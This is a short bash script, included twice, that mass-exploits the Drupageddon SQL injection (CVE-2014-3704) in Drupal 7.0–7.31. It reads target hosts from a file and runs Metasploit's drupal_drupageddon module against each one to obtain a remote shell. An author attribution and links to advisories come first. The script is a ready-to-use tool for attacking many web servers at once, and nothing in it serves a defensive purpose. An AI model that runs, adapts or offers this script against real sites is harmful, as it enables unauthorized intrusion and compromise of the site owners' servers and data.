MINI-EXPLOIT // Drupal HTTP Parameter Key/Value SQL Injection

## Drupal7.0-7.31.sh
#!/bin/bash
: '
 MINI-EXPLOIT // Metasploit->Drupal HTTP Parameter Key/Value SQL Injection
 This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
 (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance.
 This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

 Exploração: Drupal 7.0 - 7.31
 -----------------------------------------------------------------------
 AUTOR-SCRIPT-OTIMIZADOR:
 Cleiton Pinheiro / Nick: googleINURL

 [+] EMAIL:        inurlbr@gmail.com
 [+] Blog:         http://blog.inurl.com.br
 [+] Twitter:      https://twitter.com/googleinurl
 [+] Fanpage:      https://fb.com/InurlBrasil
 [+] Pastebin      http://pastebin.com/u/Googleinurl
 [+] GIT:          https://github.com/googleinurl
 [+] PSS:          http://packetstormsecurity.com/user/googleinurl
 [+] EXA:          http://exploit4arab.net/author/248/Cleiton_Pinheiro
 [+] YOUTUBE:      http://youtube.com/c/INURLBrasil
 [+] PLUS:         http://google.com/+INURLBrasil
 -----------------------------------------------------------------------

 Use:
 ./Drupal7.0-7.31.sh hosts.txt
'

# CVE-2014-3704
# SOURCE MODULE:
# http://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon
# URL: https://www.drupal.org/SA-CORE-2014-005
# URL: http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

echo "[+] MINI-EXPLOIT / Metasploit->(Drupal HTTP Parameter Key/Value SQL Injection) - INURL BRASIL"
filename=$1
filelines=`cat $filename`
exploit='exploit/multi/http/drupal_drupageddon'
echo "[+] [ START PROCESS ]"
echo "[+] [EXPLOIT] $exploit"
for line in $filelines ; do

    echo "----------------------------------------------------------------------------------"
    echo "=================================================================================="
    echo "----------------------------------------------------------------------------------"
    echo "[+] [ TARGET ] " $line
    echo "[!] [  exec  ]   metasploit..."
    msfconsole -x "use $exploit;set RHOST $line;exploit;exit;"

done
	#!/bin/bash
	: '
	MINI-EXPLOIT // Metasploit->Drupal HTTP Parameter Key/Value SQL Injection
	This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
	(aka Drupageddon) in order to achieve a remote shell on the vulnerable instance.
	This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).

	Exploração: Drupal 7.0 - 7.31
	-----------------------------------------------------------------------
	AUTOR-SCRIPT-OTIMIZADOR:
	Cleiton Pinheiro / Nick: googleINURL

	[+] EMAIL: inurlbr@gmail.com
	[+] Blog: http://blog.inurl.com.br
	[+] Twitter: https://twitter.com/googleinurl
	[+] Fanpage: https://fb.com/InurlBrasil
	[+] Pastebin http://pastebin.com/u/Googleinurl
	[+] GIT: https://github.com/googleinurl
	[+] PSS: http://packetstormsecurity.com/user/googleinurl
	[+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
	[+] YOUTUBE: http://youtube.com/c/INURLBrasil
	[+] PLUS: http://google.com/+INURLBrasil
	-----------------------------------------------------------------------

	Use:
	./Drupal7.0-7.31.sh hosts.txt
	'

	# CVE-2014-3704
	# SOURCE MODULE:
	# http://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon
	# URL: https://www.drupal.org/SA-CORE-2014-005
	# URL: http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

	echo "[+] MINI-EXPLOIT / Metasploit->(Drupal HTTP Parameter Key/Value SQL Injection) - INURL BRASIL"
	filename=$1
	filelines=`cat $filename`
	exploit='exploit/multi/http/drupal_drupageddon'
	echo "[+] [ START PROCESS ]"
	echo "[+] [EXPLOIT] $exploit"
	for line in $filelines ; do

	echo "----------------------------------------------------------------------------------"
	echo "=================================================================================="
	echo "----------------------------------------------------------------------------------"
	echo "[+] [ TARGET ] " $line
	echo "[!] [ exec ] metasploit..."
	msfconsole -x "use $exploit;set RHOST $line;exploit;exit;"

	done